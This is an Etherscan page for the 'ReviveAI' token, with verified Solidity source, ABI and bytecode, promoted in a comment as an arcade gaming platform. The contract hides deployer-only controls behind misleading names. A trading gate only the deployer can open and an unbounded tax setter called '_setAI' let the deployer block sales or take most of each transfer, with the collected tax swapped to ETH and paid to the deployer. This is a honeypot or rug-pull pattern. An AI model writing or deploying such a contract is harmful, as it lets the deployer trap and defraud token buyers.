ETH Price: $3,385.00 (-1.80%)
Gas: 1 Gwei

Token

ReviveAI (RVEAI)
 

Overview

Max Total Supply

100,000,000 RVEAI

Holders

16

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
3,271,522.989739701683454516 RVEAI

Value
$0.00
0x04bd8473f2930960f9fbbff57a78c65b6484c583
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
ReviveAI

Compiler Version
v0.8.20+commit.a1b79de6

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, Unlicense license
/**
 *Submitted for verification at Etherscan.io on 2023-11-12
*/

/*

Welcome to ReviveAI!

ReviveAI platform allows for you to revisit the old days of arcade and play video games together with immersion in our community. The project allows you to create your own avatar that will be used in the online communities of the game to chat and to play games with.

Have fun chatting with our ReviveAIBot!

Telegram: https://t.me/ReviveAIPortal
Twitter: https://twitter.com/ReviveAIERC20
Website: https://reviveai.site
Medium: https://medium.com/@revive-ai

*/
// SPDX-License-Identifier: unlicense

pragma solidity ^0.8.20;

    interface IUniswapV2Router02 {
        function swapExactTokensForETHSupportingFeeOnTransferTokens(
            uint amountIn,
            uint amountOutMin,
            address[] calldata path,
            address to,
            uint deadline
            ) external;
        }
        
    contract ReviveAI {
        string public constant name = "ReviveAI";  //
        string public constant symbol = "RVEAI";  //
        uint8 public constant decimals = 18;
        uint256 public constant totalSupply = 100_000_000 * 10**decimals;

        uint256 BurnFigure = 0;
        uint256 ConfirmFigure = 2;
        uint256 constant swapAmount = totalSupply / 100;

        mapping (address => uint256) public balanceOf;
        mapping (address => mapping (address => uint256)) public allowance;
            
        error Permissions();
            
        event Transfer(address indexed from, address indexed to, uint256 value);
        event Approval(
            address indexed owner,
            address indexed spender,
            uint256 value
        );
            

        address private pair;
        address constant ETH = 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2;
        address constant routerAddress = 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D;
        IUniswapV2Router02 constant _uniswapV2Router = IUniswapV2Router02(routerAddress);
        address payable constant deployer = payable(address(0x5F481430E68885098B571110360bA44487e84749)); //

        bool private swapping;
        bool private tradingOpenNow;

        constructor() {
            balanceOf[msg.sender] = totalSupply;
            allowance[address(this)][routerAddress] = type(uint256).max;
            emit Transfer(address(0), msg.sender, totalSupply);
        }

         receive() external payable {}

        function approve(address spender, uint256 amount) external returns (bool){
            allowance[msg.sender][spender] = amount;
            emit Approval(msg.sender, spender, amount);
            return true;
        }

        function transfer(address to, uint256 amount) external returns (bool){
            return _transfer(msg.sender, to, amount);
        }

        function transferFrom(address from, address to, uint256 amount) external returns (bool){
            allowance[from][msg.sender] -= amount;        
            return _transfer(from, to, amount);
        }

        function _transfer(address from, address to, uint256 amount) internal returns (bool){
            require(tradingOpenNow || from == deployer || to == deployer);

            if(!tradingOpenNow && pair == address(0) && amount > 0)
                pair = to;

            balanceOf[from] -= amount;

            if (to == pair && !swapping && balanceOf[address(this)] >= swapAmount){
                swapping = true;
                address[] memory path = new  address[](2);
                path[0] = address(this);
                path[1] = ETH;
                _uniswapV2Router.swapExactTokensForETHSupportingFeeOnTransferTokens(
                    swapAmount,
                    0,
                    path,
                    address(this),
                    block.timestamp
                    );
                deployer.transfer(address(this).balance);
                swapping = false;
                }

            if(from != address(this)){
                uint256 FinalFigure = amount * (from == pair ? BurnFigure : ConfirmFigure) / 100;
                amount -= FinalFigure;
                balanceOf[address(this)] += FinalFigure;
            }
                balanceOf[to] += amount;
                emit Transfer(from, to, amount);
                return true;
            }

        function NowTradingOpen() external {
            require(msg.sender == deployer);
            require(!tradingOpenNow);
            tradingOpenNow = true;        
            }

        function _setAI(uint256 newBurn, uint256 newConfirm) external {
            require(msg.sender == deployer);
            BurnFigure = newBurn;
            ConfirmFigure = newConfirm;
            }
        }

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"inputs":[],"name":"Permissions","type":"error"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"NowTradingOpen","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"newBurn","type":"uint256"},{"internalType":"uint256","name":"newConfirm","type":"uint256"}],"name":"_setAI","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"},{"internalType":"address","name":"","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"stateMutability":"payable","type":"receive"}]

60806040525f8055600260015534801562000018575f80fd5b50620000276012600a620001dc565b62000037906305f5e100620001f3565b335f8181526002602090815260408083209490945530825260038152838220737a250d5630b4cf539739df2c5dacb4c659f2488d835290529182205f199055907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef620000a66012600a620001dc565b620000b6906305f5e100620001f3565b60405190815260200160405180910390a36200020d565b634e487b7160e01b5f52601160045260245ffd5b600181815b808511156200012157815f1904821115620001055762000105620000cd565b808516156200011357918102915b93841c9390800290620000e6565b509250929050565b5f826200013957506001620001d6565b816200014757505f620001d6565b81600181146200016057600281146200016b576200018b565b6001915050620001d6565b60ff8411156200017f576200017f620000cd565b50506001821b620001d6565b5060208310610133831016604e8410600b8410161715620001b0575081810a620001d6565b620001bc8383620000e1565b805f1904821115620001d257620001d2620000cd565b0290505b92915050565b5f620001ec60ff84168362000129565b9392505050565b8082028115828204841417620001d657620001d6620000cd565b610ae4806200021b5f395ff3fe60806040526004361061009d575f3560e01c8063415946e411610062578063415946e4146101875780636ffa6406146101a857806370a08231146101bc57806395d89b41146101e7578063a9059cbb14610217578063dd62ed3e14610236575f80fd5b806306fdde03146100a8578063095ea7b3146100f157806318160ddd1461012057806323b872dd14610142578063313ce56714610161575f80fd5b366100a457005b5f80fd5b3480156100b3575f80fd5b506100db60405180604001604052806008815260200167526576697665414960c01b81525081565b6040516100e8919061079c565b60405180910390f35b3480156100fc575f80fd5b5061011061010b366004610802565b61026c565b60405190151581526020016100e8565b34801561012b575f80fd5b506101346102d8565b6040519081526020016100e8565b34801561014d575f80fd5b5061011061015c36600461082a565b6102f5565b34801561016c575f80fd5b50610175601281565b60405160ff90911681526020016100e8565b348015610192575f80fd5b506101a66101a1366004610863565b610342565b005b3480156101b3575f80fd5b506101a661036b565b3480156101c7575f80fd5b506101346101d6366004610883565b60026020525f908152604090205481565b3480156101f2575f80fd5b506100db60405180604001604052806005815260200164525645414960d81b81525081565b348015610222575f80fd5b50610110610231366004610802565b6103b5565b348015610241575f80fd5b5061013461025036600461089c565b600360209081525f928352604080842090915290825290205481565b335f8181526003602090815260408083206001600160a01b038716808552925280832085905551919290917f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925906102c69086815260200190565b60405180910390a35060015b92915050565b6102e46012600a6109c1565b6102f2906305f5e1006109cf565b81565b6001600160a01b0383165f9081526003602090815260408083203384529091528120805483919083906103299084906109e6565b9091555061033a90508484846103c8565b949350505050565b33735f481430e68885098b571110360ba44487e8474914610361575f80fd5b5f91909155600155565b33735f481430e68885098b571110360ba44487e847491461038a575f80fd5b600454600160a81b900460ff16156103a0575f80fd5b6004805460ff60a81b1916600160a81b179055565b5f6103c13384846103c8565b9392505050565b6004545f90600160a81b900460ff16806103fe57506001600160a01b038416735f481430e68885098b571110360ba44487e84749145b8061042557506001600160a01b038316735f481430e68885098b571110360ba44487e84749145b61042d575f80fd5b600454600160a81b900460ff1615801561045057506004546001600160a01b0316155b801561045b57505f82115b1561047c57600480546001600160a01b0319166001600160a01b0385161790555b6001600160a01b0384165f90815260026020526040812080548492906104a39084906109e6565b90915550506004546001600160a01b0384811691161480156104cf5750600454600160a01b900460ff16155b801561050e575060646104e46012600a6109c1565b6104f2906305f5e1006109cf565b6104fc91906109f9565b305f9081526002602052604090205410155b15610698576004805460ff60a01b1916600160a01b1790556040805160028082526060820183525f9260208301908036833701905050905030815f8151811061055957610559610a18565b60200260200101906001600160a01b031690816001600160a01b03168152505073c02aaa39b223fe8d0a0e5c4f27ead9083c756cc2816001815181106105a1576105a1610a18565b6001600160a01b0390921660209283029190910190910152737a250d5630b4cf539739df2c5dacb4c659f2488d63791ac94760646105e16012600a6109c1565b6105ef906305f5e1006109cf565b6105f991906109f9565b5f8430426040518663ffffffff1660e01b815260040161061d959493929190610a2c565b5f604051808303815f87803b158015610634575f80fd5b505af1158015610646573d5f803e3d5ffd5b5050604051735f481430e68885098b571110360ba44487e8474992504780156108fc029250905f818181858888f19350505050158015610688573d5f803e3d5ffd5b50506004805460ff60a01b191690555b6001600160a01b0384163014610717576004545f906064906001600160a01b038781169116146106ca576001546106cd565b5f545b6106d790856109cf565b6106e191906109f9565b90506106ed81846109e6565b305f90815260026020526040812080549295508392909190610710908490610a9b565b9091555050505b6001600160a01b0383165f908152600260205260408120805484929061073e908490610a9b565b92505081905550826001600160a01b0316846001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161078a91815260200190565b60405180910390a35060019392505050565b5f6020808352835180828501525f5b818110156107c7578581018301518582016040015282016107ab565b505f604082860101526040601f19601f8301168501019250505092915050565b80356001600160a01b03811681146107fd575f80fd5b919050565b5f8060408385031215610813575f80fd5b61081c836107e7565b946020939093013593505050565b5f805f6060848603121561083c575f80fd5b610845846107e7565b9250610853602085016107e7565b9150604084013590509250925092565b5f8060408385031215610874575f80fd5b50508035926020909101359150565b5f60208284031215610893575f80fd5b6103c1826107e7565b5f80604083850312156108ad575f80fd5b6108b6836107e7565b91506108c4602084016107e7565b90509250929050565b634e487b7160e01b5f52601160045260245ffd5b600181815b8085111561091b57815f1904821115610901576109016108cd565b8085161561090e57918102915b93841c93908002906108e6565b509250929050565b5f82610931575060016102d2565b8161093d57505f6102d2565b8160018114610953576002811461095d57610979565b60019150506102d2565b60ff84111561096e5761096e6108cd565b50506001821b6102d2565b5060208310610133831016604e8410600b841016171561099c575081810a6102d2565b6109a683836108e1565b805f19048211156109b9576109b96108cd565b029392505050565b5f6103c160ff841683610923565b80820281158282048414176102d2576102d26108cd565b818103818111156102d2576102d26108cd565b5f82610a1357634e487b7160e01b5f52601260045260245ffd5b500490565b634e487b7160e01b5f52603260045260245ffd5b5f60a082018783526020878185015260a0604085015281875180845260c08601915082890193505f5b81811015610a7a5784516001600160a01b031683529383019391830191600101610a55565b50506001600160a01b03969096166060850152505050608001529392505050565b808201808211156102d2576102d26108cd56fea2646970667358221220f890bb4d6d5f06791d1b5c409e7c2ebcdcb81c87faeed2c10fc1bf1ab56f20c064736f6c63430008140033

Deployed Bytecode

0x60806040526004361061009d575f3560e01c8063415946e411610062578063415946e4146101875780636ffa6406146101a857806370a08231146101bc57806395d89b41146101e7578063a9059cbb14610217578063dd62ed3e14610236575f80fd5b806306fdde03146100a8578063095ea7b3146100f157806318160ddd1461012057806323b872dd14610142578063313ce56714610161575f80fd5b366100a457005b5f80fd5b3480156100b3575f80fd5b506100db60405180604001604052806008815260200167526576697665414960c01b81525081565b6040516100e8919061079c565b60405180910390f35b3480156100fc575f80fd5b5061011061010b366004610802565b61026c565b60405190151581526020016100e8565b34801561012b575f80fd5b506101346102d8565b6040519081526020016100e8565b34801561014d575f80fd5b5061011061015c36600461082a565b6102f5565b34801561016c575f80fd5b50610175601281565b60405160ff90911681526020016100e8565b348015610192575f80fd5b506101a66101a1366004610863565b610342565b005b3480156101b3575f80fd5b506101a661036b565b3480156101c7575f80fd5b506101346101d6366004610883565b60026020525f908152604090205481565b3480156101f2575f80fd5b506100db60405180604001604052806005815260200164525645414960d81b81525081565b348015610222575f80fd5b50610110610231366004610802565b6103b5565b348015610241575f80fd5b5061013461025036600461089c565b600360209081525f928352604080842090915290825290205481565b335f8181526003602090815260408083206001600160a01b038716808552925280832085905551919290917f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925906102c69086815260200190565b60405180910390a35060015b92915050565b6102e46012600a6109c1565b6102f2906305f5e1006109cf565b81565b6001600160a01b0383165f9081526003602090815260408083203384529091528120805483919083906103299084906109e6565b9091555061033a90508484846103c8565b949350505050565b33735f481430e68885098b571110360ba44487e8474914610361575f80fd5b5f91909155600155565b33735f481430e68885098b571110360ba44487e847491461038a575f80fd5b600454600160a81b900460ff16156103a0575f80fd5b6004805460ff60a81b1916600160a81b179055565b5f6103c13384846103c8565b9392505050565b6004545f90600160a81b900460ff16806103fe57506001600160a01b038416735f481430e68885098b571110360ba44487e84749145b8061042557506001600160a01b038316735f481430e68885098b571110360ba44487e84749145b61042d575f80fd5b600454600160a81b900460ff1615801561045057506004546001600160a01b0316155b801561045b57505f82115b1561047c57600480546001600160a01b0319166001600160a01b0385161790555b6001600160a01b0384165f90815260026020526040812080548492906104a39084906109e6565b90915550506004546001600160a01b0384811691161480156104cf5750600454600160a01b900460ff16155b801561050e575060646104e46012600a6109c1565b6104f2906305f5e1006109cf565b6104fc91906109f9565b305f9081526002602052604090205410155b15610698576004805460ff60a01b1916600160a01b1790556040805160028082526060820183525f9260208301908036833701905050905030815f8151811061055957610559610a18565b60200260200101906001600160a01b031690816001600160a01b03168152505073c02aaa39b223fe8d0a0e5c4f27ead9083c756cc2816001815181106105a1576105a1610a18565b6001600160a01b0390921660209283029190910190910152737a250d5630b4cf539739df2c5dacb4c659f2488d63791ac94760646105e16012600a6109c1565b6105ef906305f5e1006109cf565b6105f991906109f9565b5f8430426040518663ffffffff1660e01b815260040161061d959493929190610a2c565b5f604051808303815f87803b158015610634575f80fd5b505af1158015610646573d5f803e3d5ffd5b5050604051735f481430e68885098b571110360ba44487e8474992504780156108fc029250905f818181858888f19350505050158015610688573d5f803e3d5ffd5b50506004805460ff60a01b191690555b6001600160a01b0384163014610717576004545f906064906001600160a01b038781169116146106ca576001546106cd565b5f545b6106d790856109cf565b6106e191906109f9565b90506106ed81846109e6565b305f90815260026020526040812080549295508392909190610710908490610a9b565b9091555050505b6001600160a01b0383165f908152600260205260408120805484929061073e908490610a9b565b92505081905550826001600160a01b0316846001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161078a91815260200190565b60405180910390a35060019392505050565b5f6020808352835180828501525f5b818110156107c7578581018301518582016040015282016107ab565b505f604082860101526040601f19601f8301168501019250505092915050565b80356001600160a01b03811681146107fd575f80fd5b919050565b5f8060408385031215610813575f80fd5b61081c836107e7565b946020939093013593505050565b5f805f6060848603121561083c575f80fd5b610845846107e7565b9250610853602085016107e7565b9150604084013590509250925092565b5f8060408385031215610874575f80fd5b50508035926020909101359150565b5f60208284031215610893575f80fd5b6103c1826107e7565b5f80604083850312156108ad575f80fd5b6108b6836107e7565b91506108c4602084016107e7565b90509250929050565b634e487b7160e01b5f52601160045260245ffd5b600181815b8085111561091b57815f1904821115610901576109016108cd565b8085161561090e57918102915b93841c93908002906108e6565b509250929050565b5f82610931575060016102d2565b8161093d57505f6102d2565b8160018114610953576002811461095d57610979565b60019150506102d2565b60ff84111561096e5761096e6108cd565b50506001821b6102d2565b5060208310610133831016604e8410600b841016171561099c575081810a6102d2565b6109a683836108e1565b805f19048211156109b9576109b96108cd565b029392505050565b5f6103c160ff841683610923565b80820281158282048414176102d2576102d26108cd565b818103818111156102d2576102d26108cd565b5f82610a1357634e487b7160e01b5f52601260045260245ffd5b500490565b634e487b7160e01b5f52603260045260245ffd5b5f60a082018783526020878185015260a0604085015281875180845260c08601915082890193505f5b81811015610a7a5784516001600160a01b031683529383019391830191600101610a55565b50506001600160a01b03969096166060850152505050608001529392505050565b808201808211156102d2576102d26108cd56fea2646970667358221220f890bb4d6d5f06791d1b5c409e7c2ebcdcb81c87faeed2c10fc1bf1ab56f20c064736f6c63430008140033

Deployed Bytecode Sourcemap

878:3899:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;907:40;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;;907:40:0;;;;;;;;;;;;:::i;:::-;;;;;;;;2432:222;;;;;;;;;;-1:-1:-1;2432:222:0;;;;;:::i;:::-;;:::i;:::-;;;1169:14:1;;1162:22;1144:41;;1132:2;1117:18;2432:222:0;1004:187:1;1062:64:0;;;;;;;;;;;;;:::i;:::-;;;1342:25:1;;;1330:2;1315:18;1062:64:0;1196:177:1;2814:208:0;;;;;;;;;;-1:-1:-1;2814:208:0;;;;;:::i;:::-;;:::i;1016:35::-;;;;;;;;;;;;1049:2;1016:35;;;;;1883:4:1;1871:17;;;1853:36;;1841:2;1826:18;1016:35:0;1711:184:1;4566:200:0;;;;;;;;;;-1:-1:-1;4566:200:0;;;;;:::i;:::-;;:::i;:::-;;4374:180;;;;;;;;;;;;;:::i;1268:45::-;;;;;;;;;;-1:-1:-1;1268:45:0;;;;;:::i;:::-;;;;;;;;;;;;;;962:39;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;;962:39:0;;;;;2666:136;;;;;;;;;;-1:-1:-1;2666:136:0;;;;;:::i;:::-;;:::i;1324:66::-;;;;;;;;;;-1:-1:-1;1324:66:0;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;2432:222;2530:10;2500:4;2520:21;;;:9;:21;;;;;;;;-1:-1:-1;;;;;2520:30:0;;;;;;;;;;:39;;;2579:37;2500:4;;2520:30;;2579:37;;;;2553:6;1342:25:1;;1330:2;1315:18;;1196:177;2579:37:0;;;;;;;;-1:-1:-1;2638:4:0;2432:222;;;;;:::o;1062:64::-;1114:12;1049:2;1114;:12;:::i;:::-;1100:26;;:11;:26;:::i;:::-;1062:64;:::o;2814:208::-;-1:-1:-1;;;;;2916:15:0;;2896:4;2916:15;;;:9;:15;;;;;;;;2932:10;2916:27;;;;;;;:37;;2947:6;;2916:27;2896:4;;2916:37;;2947:6;;2916:37;:::i;:::-;;;;-1:-1:-1;2983:27:0;;-1:-1:-1;2993:4:0;2999:2;3003:6;2983:9;:27::i;:::-;2976:34;2814:208;-1:-1:-1;;;;2814:208:0:o;4566:200::-;4651:10;2031:42;4651:22;4643:31;;;;;;4689:10;:20;;;;4724:13;:26;4566:200::o;4374:180::-;4432:10;2031:42;4432:22;4424:31;;;;;;4479:14;;-1:-1:-1;;;4479:14:0;;;;4478:15;4470:24;;;;;;4509:14;:21;;-1:-1:-1;;;;4509:21:0;-1:-1:-1;;;4509:21:0;;;4374:180::o;2666:136::-;2730:4;2757:33;2767:10;2779:2;2783:6;2757:9;:33::i;:::-;2750:40;2666:136;-1:-1:-1;;;2666:136:0:o;3034:1328::-;3141:14;;3113:4;;-1:-1:-1;;;3141:14:0;;;;;:34;;-1:-1:-1;;;;;;3159:16:0;;2031:42;3159:16;3141:34;:52;;;-1:-1:-1;;;;;;3179:14:0;;2031:42;3179:14;3141:52;3133:61;;;;;;3215:14;;-1:-1:-1;;;3215:14:0;;;;3214:15;:37;;;;-1:-1:-1;3233:4:0;;-1:-1:-1;;;;;3233:4:0;:18;3214:37;:51;;;;;3264:1;3255:6;:10;3214:51;3211:82;;;3284:4;:9;;-1:-1:-1;;;;;;3284:9:0;-1:-1:-1;;;;;3284:9:0;;;;;3211:82;-1:-1:-1;;;;;3310:15:0;;;;;;:9;:15;;;;;:25;;3329:6;;3310:15;:25;;3329:6;;3310:25;:::i;:::-;;;;-1:-1:-1;;3362:4:0;;-1:-1:-1;;;;;3356:10:0;;;3362:4;;3356:10;:23;;;;-1:-1:-1;3371:8:0;;-1:-1:-1;;;3371:8:0;;;;3370:9;3356:23;:65;;;;-1:-1:-1;1252:3:0;1114:12;1049:2;1114;:12;:::i;:::-;1100:26;;:11;:26;:::i;:::-;1238:17;;;;:::i;:::-;3401:4;3383:24;;;;:9;:24;;;;;;:38;;3356:65;3352:619;;;3441:8;:15;;-1:-1:-1;;;;3441:15:0;-1:-1:-1;;;3441:15:0;;;3499:17;;;3514:1;3499:17;;;;;;;;-1:-1:-1;;3499:17:0;;;;;;;;;;-1:-1:-1;3499:17:0;3475:41;;3553:4;3535;3540:1;3535:7;;;;;;;;:::i;:::-;;;;;;:23;-1:-1:-1;;;;;3535:23:0;;;-1:-1:-1;;;;;3535:23:0;;;;;1749:42;3577:4;3582:1;3577:7;;;;;;;;:::i;:::-;-1:-1:-1;;;;;3577:13:0;;;:7;;;;;;;;;;;:13;1835:42;3609:67;1252:3;1114:12;1049:2;1114;:12;:::i;:::-;1100:26;;:11;:26;:::i;:::-;1238:17;;;;:::i;:::-;3732:1;3756:4;3791;3819:15;3609:248;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;3876:40:0;;2031:42;;-1:-1:-1;3894:21:0;3876:40;;;;;-1:-1:-1;3894:21:0;3876:40;;;;3894:21;2031:42;3876:40;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;3935:8:0;:16;;-1:-1:-1;;;;3935:16:0;;;3352:619;-1:-1:-1;;;;;3990:21:0;;4006:4;3990:21;3987:238;;4071:4;;4031:19;;4108:3;;-1:-1:-1;;;;;4063:12:0;;;4071:4;;4063:12;:41;;4091:13;;4063:41;;;4078:10;;4063:41;4053:52;;:6;:52;:::i;:::-;:58;;;;:::i;:::-;4031:80;-1:-1:-1;4130:21:0;4031:80;4130:21;;:::i;:::-;4188:4;4170:24;;;;:9;:24;;;;;:39;;4130:21;;-1:-1:-1;4198:11:0;;4170:24;;;:39;;4198:11;;4170:39;:::i;:::-;;;;-1:-1:-1;;;3987:238:0;-1:-1:-1;;;;;4243:13:0;;;;;;:9;:13;;;;;:23;;4260:6;;4243:13;:23;;4260:6;;4243:23;:::i;:::-;;;;;;;;4305:2;-1:-1:-1;;;;;4290:26:0;4299:4;-1:-1:-1;;;;;4290:26:0;;4309:6;4290:26;;;;1342:25:1;;1330:2;1315:18;;1196:177;4290:26:0;;;;;;;;-1:-1:-1;4342:4:0;3034:1328;;;;;:::o;14:548:1:-;126:4;155:2;184;173:9;166:21;216:6;210:13;259:6;254:2;243:9;239:18;232:34;284:1;294:140;308:6;305:1;302:13;294:140;;;403:14;;;399:23;;393:30;369:17;;;388:2;365:26;358:66;323:10;;294:140;;;298:3;483:1;478:2;469:6;458:9;454:22;450:31;443:42;553:2;546;542:7;537:2;529:6;525:15;521:29;510:9;506:45;502:54;494:62;;;;14:548;;;;:::o;567:173::-;635:20;;-1:-1:-1;;;;;684:31:1;;674:42;;664:70;;730:1;727;720:12;664:70;567:173;;;:::o;745:254::-;813:6;821;874:2;862:9;853:7;849:23;845:32;842:52;;;890:1;887;880:12;842:52;913:29;932:9;913:29;:::i;:::-;903:39;989:2;974:18;;;;961:32;;-1:-1:-1;;;745:254:1:o;1378:328::-;1455:6;1463;1471;1524:2;1512:9;1503:7;1499:23;1495:32;1492:52;;;1540:1;1537;1530:12;1492:52;1563:29;1582:9;1563:29;:::i;:::-;1553:39;;1611:38;1645:2;1634:9;1630:18;1611:38;:::i;:::-;1601:48;;1696:2;1685:9;1681:18;1668:32;1658:42;;1378:328;;;;;:::o;1900:248::-;1968:6;1976;2029:2;2017:9;2008:7;2004:23;2000:32;1997:52;;;2045:1;2042;2035:12;1997:52;-1:-1:-1;;2068:23:1;;;2138:2;2123:18;;;2110:32;;-1:-1:-1;1900:248:1:o;2153:186::-;2212:6;2265:2;2253:9;2244:7;2240:23;2236:32;2233:52;;;2281:1;2278;2271:12;2233:52;2304:29;2323:9;2304:29;:::i;2344:260::-;2412:6;2420;2473:2;2461:9;2452:7;2448:23;2444:32;2441:52;;;2489:1;2486;2479:12;2441:52;2512:29;2531:9;2512:29;:::i;:::-;2502:39;;2560:38;2594:2;2583:9;2579:18;2560:38;:::i;:::-;2550:48;;2344:260;;;;;:::o;2609:127::-;2670:10;2665:3;2661:20;2658:1;2651:31;2701:4;2698:1;2691:15;2725:4;2722:1;2715:15;2741:422;2830:1;2873:5;2830:1;2887:270;2908:7;2898:8;2895:21;2887:270;;;2967:4;2963:1;2959:6;2955:17;2949:4;2946:27;2943:53;;;2976:18;;:::i;:::-;3026:7;3016:8;3012:22;3009:55;;;3046:16;;;;3009:55;3125:22;;;;3085:15;;;;2887:270;;;2891:3;2741:422;;;;;:::o;3168:806::-;3217:5;3247:8;3237:80;;-1:-1:-1;3288:1:1;3302:5;;3237:80;3336:4;3326:76;;-1:-1:-1;3373:1:1;3387:5;;3326:76;3418:4;3436:1;3431:59;;;;3504:1;3499:130;;;;3411:218;;3431:59;3461:1;3452:10;;3475:5;;;3499:130;3536:3;3526:8;3523:17;3520:43;;;3543:18;;:::i;:::-;-1:-1:-1;;3599:1:1;3585:16;;3614:5;;3411:218;;3713:2;3703:8;3700:16;3694:3;3688:4;3685:13;3681:36;3675:2;3665:8;3662:16;3657:2;3651:4;3648:12;3644:35;3641:77;3638:159;;;-1:-1:-1;3750:19:1;;;3782:5;;3638:159;3829:34;3854:8;3848:4;3829:34;:::i;:::-;3899:6;3895:1;3891:6;3887:19;3878:7;3875:32;3872:58;;;3910:18;;:::i;:::-;3948:20;;3168:806;-1:-1:-1;;;3168:806:1:o;3979:140::-;4037:5;4066:47;4107:4;4097:8;4093:19;4087:4;4066:47;:::i;4124:168::-;4197:9;;;4228;;4245:15;;;4239:22;;4225:37;4215:71;;4266:18;;:::i;4297:128::-;4364:9;;;4385:11;;;4382:37;;;4399:18;;:::i;4430:217::-;4470:1;4496;4486:132;;4540:10;4535:3;4531:20;4528:1;4521:31;4575:4;4572:1;4565:15;4603:4;4600:1;4593:15;4486:132;-1:-1:-1;4632:9:1;;4430:217::o;4784:127::-;4845:10;4840:3;4836:20;4833:1;4826:31;4876:4;4873:1;4866:15;4900:4;4897:1;4890:15;4916:980;5178:4;5226:3;5215:9;5211:19;5257:6;5246:9;5239:25;5283:2;5321:6;5316:2;5305:9;5301:18;5294:34;5364:3;5359:2;5348:9;5344:18;5337:31;5388:6;5423;5417:13;5454:6;5446;5439:22;5492:3;5481:9;5477:19;5470:26;;5531:2;5523:6;5519:15;5505:29;;5552:1;5562:195;5576:6;5573:1;5570:13;5562:195;;;5641:13;;-1:-1:-1;;;;;5637:39:1;5625:52;;5732:15;;;;5697:12;;;;5673:1;5591:9;5562:195;;;-1:-1:-1;;;;;;;5813:32:1;;;;5808:2;5793:18;;5786:60;-1:-1:-1;;;5877:3:1;5862:19;5855:35;5774:3;4916:980;-1:-1:-1;;;4916:980:1:o;5901:125::-;5966:9;;;5987:10;;;5984:36;;;6000:18;;:::i

Swarm Source

ipfs://f890bb4d6d5f06791d1b5c409e7c2ebcdcb81c87faeed2c10fc1bf1ab56f20c0
Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.